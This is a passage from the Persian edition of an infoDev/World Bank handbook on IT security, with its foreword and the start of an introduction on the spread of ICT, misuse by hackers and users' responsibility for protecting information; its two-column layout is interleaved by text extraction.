‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﻣﺮﺍﺗﺐ ﺗﺸﻜﺮ ﻭ ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺩﻟﻴﻞ ﺑﺬﻝ ﺗﻮﺟﻪ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺍﻳـﺎﻟﺘﻲ ﺍﻣـﻮﺭ ﺍﻗﺘـﺼﺎﺩﻱ ﺳـﻮﺋﻴﺲ‬
‫)‪ ٤(SECO‬ﻧﻪﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺗﺄﻣﻴﻦ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﭘﺮﻭﮊﻩ‪ ،‬ﺑﻠﻜﻪ ﺑﺨﺎﻃﺮ ﺩﺭﻙ ﻓﻮﺭﻳﺖ ﻣﺴﺌﻠﻪ ﻭ ﺑﻪ ﺛﻤﺮ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻋﻼﻡ ﻧﻤﺎﺋﻴﻢ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )‪ ٥(ICT‬ﻧﻘﺶ ﻣﻬﻤﻲ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺍﺯ ﻧﻈـﺮ‬
‫ﺩﻭﺭ ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻧﺎﺍﻣﻦ ﻭ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺎﺷﺪﻧﻲ ﺍﺳﺖ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺍﻱ ﻧﻘﺸﻲ ﺍﺳﺎﺳﻲ ﻭ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺩﺭ ﺍﻳﺠﺎﺩ ﺷﺮﺍﻳﻂ ﻻﺯﻡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻮﻓﻖ ﻃﺮﺡﻫﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺍﺟﺮﺍﻱ ﭘﺮﻭﮊﻩﻫﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ ﻭ ﭘـﺮﻭﺭﺵ‪ ،‬ﺑﻬﺪﺍﺷـﺖ ﻳـﺎ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﻭ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺿﻮﻉ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﮕﺎﻡ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺣﺎﻝ ﺗﻜﻮﻳﻦ ﺍﺳﺖ‪ .‬ﻣﺆﻟﻔﻴﻦ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺍﻧﺴﺘﻪ‪-‬‬
‫ﺍﻧﺪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺭﺍ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ‪ -‬ﺑﺮﺍﻱ ﻣﺤﻴﻂﻫﺎﻱ ﻭﻳﮋﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪ .‬ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ www.infodev-security.net‬ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪﺭﻭﺯ ﻭ ﻣﻨﺎﺳﺐ ﺩﺳﺖ ﻳﺎﺑﻨـﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳـﻦ ﺟﺮﻳـﺎﻥ‬
‫ﻲ ﺛﺎﺑــﺖ‪ ،‬ﺍﺯ ﭘﻴــﺸﺮﻓﺖﻫــﺎﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎﺧﺒﺮ ﺷــﻮﻧﺪ‪ .‬ﺑــﺎ ﺗﻮﺟــﻪ ﺑــﻪ ﺍﻳﻨﻜــﻪ ﻣﻄﺎﻟــﺐ‬
‫ﺍﻃــﻼﻉﺭﺳــﺎﻧ ﹺ‬
‫ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻟﺰﻭﻣﹰﺎ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ‪ infoDev‬ﻳﺎ ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻨﻌﻜﺲ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﺑﻨﻈﺮ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻛﻨـﺎﺭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻤﻚ ﺑﺰﺭﮔﻲ ﺑﻪ ﻓﻬﻢ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﻣﺘﺸﻜﻞ ﺍﺯ ﭘﻨﺞ ﺑﺨﺶ ﺍﺳﺖ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﭘـﺲ ﺍﺯ ﻣﻘﺪﻣـﻪﺍﻱ‬
‫ﻛﻮﺗﺎﻩ ﺑﺮ ﻋﻨﺎﻭﻳﻦ ﻋﻤﻮﻣﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺑﻪ ﻣﻄﺎﻟﺐ ﻭ ﻣﺒﺎﺣﺜﻲ ﺑﺮﺧﻮﺭﺩ ﺧﻮﺍﻫﻴﺪﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ‪ ،‬ﺩﻭﻟﺖ‪ ،‬ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺑﻴـﺸﺘﺮ ﭘﮋﻭﻫـﺸﻬﺎ ﻭ ﻣﻘـﺎﻻﺕ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺗﻼﺵ ﻣﺆﻟﻔﻴﻦ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺧﻂﻣﺸﻲﻫﺎﻱ ﻋﻤﻠﻲ ﻭ ﻛﺎﺭﺁﻣﺪﻱ ﺍﺭﺍﺋﻪ ﺩﻫﻨـﺪ ﻛـﻪ‬
‫ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﺁﻏﺎﺯ ﺑﻜﺎﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻧﻘﻄﺔ ﺁﻏﺎﺯ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺗﻌـﺎﻣﻠﻲ ﺍﺯ ﭘﻴـﺸﺮﻓﺖ ﻫﻤﺰﻣـﺎﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﺎﺷﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﻩ ﺁﻧﭽﻪ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻛﺘﺎﺏ‪ ،‬ﺷﻴﻮﻩ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﺁﻣﺪ ﺧﻮﺩ ﺭﺍ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫‪ :‬ﻣﺪﻳﺮ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ‪ -‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬ ‫‪Mohesn A. Khalil‬‬
‫‪ :‬ﻣﺪﻳﺮ ﺑﺮﻧﺎﻣﺔ ‪ - infoDev‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬ ‫‪Burno Lanvin‬‬
‫‪ :‬ﻣﺪﻳﺮ ﺗﻘﺴﻴﻢ ﻭﻇﺎﻳﻒ ﮔﺴﺘﺮﺵ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻛﺎﺭﺷﻨﺎﺱ ﺍﺭﺷﺪ ﺍﻧﻔﻮﺭﻣﺎﺗﻴﻚ ‪ -‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬ ‫‪Michel A.Maechler‬‬

‫‪1‬‬ ‫‪infoDev Program of the World Bank Group‬‬


‫‪2‬‬ ‫‪IT Security‬‬
‫‪3‬‬ ‫‪infoDev Technical Advisory Panel‬‬
‫‪4‬‬ ‫‪State Secretariat of Economic Affairs of Switzerland‬‬
‫‪5‬‬ ‫‪Information & Communication Technology‬‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻗـﻮﻱﺗـﺮ ﺩﺭ ﻋﺮﺻـﺔ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﭘﺮﺩﺍﺯﺵ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪﺍﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻧﻘـﻼﺏ‬
‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۷۰‬ﻣﻴﻼﺩﻱ ﺷﺮﻭﻉ ﺷـﺪ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺟﺐ ﺷﺪﻩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺍﻧﺪﺍﺯﻩ ﻭ ﻗـﺪﺭﺗﻲ ﻗﺎﺑـﻞ‬ ‫ﺳـﻴﺮ ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﻧﻮﺁﻭﺭﻳﻬــﺎﻱ‬
‫ﻣﻼﺣﻈﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪.‬‬ ‫ﺣﺎﺻﻞ ﺍﺯ ﺁﻥ ﻣﻮﺟﺐ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﺑﻬـﺮﻩﻭﺭﻱ ﻭ ﭘﻴـﺪﺍﻳﺶ‬
‫ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻳﮕـﺮ ﺍﻧـﻮﺍﻉ ﺷـﺒﻜﻪﻫـﺎﻱ ﺷﺨـﺼﻲ‬ ‫ﺍﻧــﻮﺍﻉ ﺟﺪﻳــﺪﻱ ﺍﺯ ﻛﺎﻻﻫــﺎ ﻭ ﺧــﺪﻣﺎﺕ ﺷــﺪﻩ ﺍﺳــﺖ‪ .‬ﺑــﺎ ﺑﻬﺒــﻮﺩ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﻣﻴـﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺮﺩﻡ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬ ‫ﺭﻭﺯﺍﻓﺰﻭﻥ ﻗﺪﺭﺕ‪ ،‬ﻇﺮﻓﻴﺖ ﻭ ﻗﻴﻤﺖ ﺗﺠﻬﻴﺰﺍﺕ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺳﺎﺧﺘﻪﺍﻧﺪ‪ .‬ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﺳﺎﻝ ﭘﻴﺶ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ‬ ‫ﻛﻪ ﺑﻪ ﺭﺷﺪ ﺳﺎﻻﻧﺔ ﺗﻘﺮﻳﺒﹰﺎ ‪ ۳۰‬ﺩﺭﺻـﺪﻱ ﺑﻬـﺮﻩﻭﺭﻱ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺍﻳـﻦ ﺭﺷـﺘﻪ‬ ‫ﻗﻴﻤﺖ ﻣﻨﺠﺮ ﺷﺪﻩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﻫﻤـﻪ‬
‫ﺻﻮﺭﺕ ﻣﻲ ﭘﺬﻳﺮﻓﺖ؛ ﺍﻣﺎ ﺍﻣـﺮﻭﺯﻩ ﺻـﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺭﺍﻳﺎﻧـﻪ ﺑـﺮﺍﻱ‬ ‫ﻣﻴﺴﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺮﻭﺯﻩ ﻣﺎ ﺩﺭ ﺩﻧﻴـﺎﻳﻲ ﺯﻧـﺪﮔﻲ ﻣـﻲﻛﻨـﻴﻢ ﻛـﻪ‬
‫ﭘﺮﺩﺍﺯﺵ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺼﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺗﻮﺳﻂ‬ ‫ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺍﺭﺯﺍﻥ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺭﻭ‬
‫ﻳﻚ ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻗﻮﻱ ﺑﻨﺎﻡ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬ ‫ﺑﻪ ﻛﺎﻫﺶ ﺍﺳﺖ ﻭ ﺟﻬﺎﻥ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺩﺭ ﺗﺒـﺎﺩﻝ ﻭ ﺗﻌﺎﻣـﻞ‬
‫ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﻮﺟﺐ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺮﺩﻣﻲ ﺍﺯ ﻃﺮﻳـﻖ ﭘـﺴﺖ‬ ‫ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻣﻜﺎﻥ‬ ‫ﺍﻣﺎ ﻓﺮﺍﻫﻢ ﺷـﺪﻥ ﺍﻣﻜﺎﻧـﺎﺕ ﻓﻨـﻲ ﺟﺪﻳـﺪ ﺗﻨﻬـﺎ ﺑﺎﻋـﺚ ﭘﻴـﺪﺍﻳﺶ‬
‫ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﻭ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺑـﻪ ﻣﻔـﺎﻫﻴﻢ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺍﺳـﻨﺎﺩ‬ ‫ﻣﺤﺼﻮﻻﺕ ﻧﻮﻳﻦ ﻭ ﺭﺍﻫﻬﺎﻱ ﺑﻬﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣـﻮﺭ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﻓﻨﻲ ﻭ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣـﺎﻝ ﺳـﺎﺧﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩ‬ ‫ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻛﻨﺎﺭ ﺁﻥ ﺍﻣﻜﺎﻥ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺭﺍ ﻧﻴـﺰ‬
‫ﺍﺳﺖ‪ .‬ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺗﻨﺎﺳﺐ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﻣـﺸﻜﻼﺕ‬ ‫ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴـﺰ ﻫﻤﺎﻧﻨـﺪ‬
‫ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ‪ .‬ﻋﻤﺪﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻫﺔ ‪۷۰‬‬ ‫ﺳﺎﻳﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺣﺎﻟﺖ ﺍﺑﺰﺍﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣـﻮﺭﺩ‬
‫ﻣﻴﻼﺩﻱ ﺭﺍ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺗﺸﻜﻴﻞ ﻣﻲﺩﺍﺩﻧـﺪ؛ ﺣـﺎﻝ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﮕﺎﻥ ﻣﻔﻴﺪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﻪ ﻧﺤـﻮﻱ ﺍﺯ‬
‫ﺁﻧﻜﻪ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻓﺮﺍﺩ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﻫـﺴﺘﻨﺪ ﻭ ﻟـﺬﺍ‬ ‫ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻛﻪ ﻧﺘﺎﻳﺞ ﺧﻄﺮﻧﺎﻛﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﻋﺎﻣﻞ ﺳـﺮﻋﺖ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺁﻧـﺎﻥ ﺑﺎﻋـﺚ ﺷـﻮﺩ ﻛـﻪ ﺍﺯ‬ ‫ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭼﻴﺰﻱ ﺩﺭ ﺣـﺪﻭﺩ ﻣﻴﻜﺮﻭﺛﺎﻧﻴـﻪ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﻧﻜﻨﻨـﺪ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬ ‫ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻗﺎﺑﻞ ﻣـﺸﺎﻫﺪﻩ ﺑـﺎ ﭼـﺸﻢ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﻣﺤـﻞ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬ ‫ﻏﻴﺮﻣﺴﻠﺢ‪ ،‬ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻬﻴﻪﺷﺪﻩ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ ﺟﺎﺑﺠـﺎ‬
‫ﺧﻮﺩ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺣﻤﻠﻪ ﻭ ﺍﺯ ﺁﻥ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﻓﻀﺎﻳﻲ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺨﺮﺏ ﺁﻧﻘﺪﺭ ﺳﺮﻳﻊ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻏﻴﺮﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎﺷﺪ ‪ -‬ﻫﺮﭼﻨﺪ‬
‫ﺍﮔﺮ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﻏﻴﺮ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪.‬‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺑﺮ ﻋﻬـﺪﺓ ﺷـﻤﺎ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬ ‫ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﻛﺘﺎﺏ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻭ ﻧﺤﻮﺓ ﻛﺎﺭﻛﺮﺩﻥ‬ ‫ﻭﺍﺑــﺴﺘﻪ ﺑــﻪ ﺁﻧﻬــﺎ ﻭ ﺫﺧﻴــﺮﻩ ﻭ ﺍﺭﺳــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺑــﻪ ﺷــﻜﻞ‬
